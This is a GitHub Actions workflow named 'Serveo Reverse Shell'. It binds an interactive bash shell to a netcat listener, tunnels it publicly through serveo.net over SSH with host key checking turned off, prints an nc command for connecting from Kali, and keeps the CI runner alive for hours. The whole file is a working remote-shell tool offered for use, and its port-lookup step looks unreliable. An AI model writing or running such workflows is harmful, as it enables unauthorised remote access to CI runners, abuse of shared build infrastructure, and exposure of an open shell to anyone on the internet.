name: Serveo Reverse Shell

on:
  push:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - uses: actions/checkout@v4

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install -y openssh-client netcat-openbsd

      - name: Start Reverse Shell and Tunnel with Serveo
        run: |
          echo "=== Starting Reverse Shell (Listening) ==="
          mkfifo /tmp/backpipe
          /bin/bash -i < /tmp/backpipe 2>&1 | nc -lvnp 9001 > /tmp/backpipe &
          sleep 5
          echo "=== Starting Serveo Tunnel ==="
          # Attempt raw TCP forwarding, let Serveo assign the remote port.
          ssh -o StrictHostKeyChecking=no -R localhost:9001 serveo.net &
          sleep 10
          # Extract the port from the ssh output.  This is crucial.
          SERVO_PORT=$(ssh -o StrictHostKeyChecking=no -p 22 serveo.net -t -T echo "SHOW_PORTS" | grep -oP 'serveo\.net:\K\d+')
          echo "=== Serveo assigned port: $SERVO_PORT ==="
          echo "=== To connect from your Kali terminal, use this command (after the workflow completes): ==="
          echo "=== nc serveo.net $SERVO_PORT ==="
          # Keep workflow alive
          for i in {1..360}; do
            sleep 60
          done
